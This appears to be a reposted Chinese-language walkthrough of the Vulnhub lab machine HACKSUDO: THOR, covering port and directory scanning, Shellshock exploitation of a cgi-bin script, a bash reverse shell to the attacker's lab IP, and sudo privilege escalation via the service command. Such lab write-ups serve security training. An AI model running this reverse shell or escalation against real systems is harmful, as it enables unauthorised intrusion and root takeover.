Vulnhub_HACKSUDO: THOR
Posted NowSec
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub_HACKSUDO: THOR相关的知识,希望对你有一定的参考价值。
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关
主机信息
kali:192.168.3.39
nivek:192.168.3.38
信息收集
使用nmap探测目标主机发现只开放了21、22、80三个端口
nmap -T4 -A -v -p- 192.168.3.38
访问80端口发现是一个登录页面
查看了网页中的源码没有发现可用的信息
在About-Us中得到了一些联系方式
通过目录扫描发现了一个cgi-bin的目录
dirb http://192.168.3.38 /usr/share/wordlists/dirb/big.txt
然后扫描cgi-bin下的可执行脚本,发现一个shell.sh
dirb http://192.168.3.38/cgi-bin/ -X .sh
GETSHELL
我们利用msf的检测模块验证存在shellshok漏洞
然后利用攻击模块获取shell
查看获取的shell权限发现是www权限
通过bash将msf的shell反弹到本机
bash -c 'bash -i >& /dev/tcp/192.168.3.39/4444 0>&1'
执行sudo -l
发现有一个脚本可以以thor用户无密码用root身份执行
然后我们用python获取一个tty shell
python3 -c 'import pty; pty.spawn("/bin/bash");'
接着以thor身份执行脚本
获取thor身份的shell
获取thor的tty shell
提权
再执行sudo -l
发现有cat、service可以利用
使用service提权至root
sudo service ../../bin/sh
进入root查看flag
加入我的星球
下方查看历史文章
扫描二维码
获取更多精彩
NowSec
以上是关于Vulnhub_HACKSUDO: THOR的主要内容,如果未能解决你的问题,请参考以下文章
Vulnhub_HACKSUDO: PROXIMACENTAURI
Vulnhub_HACKSUDO: PROXIMACENTAURI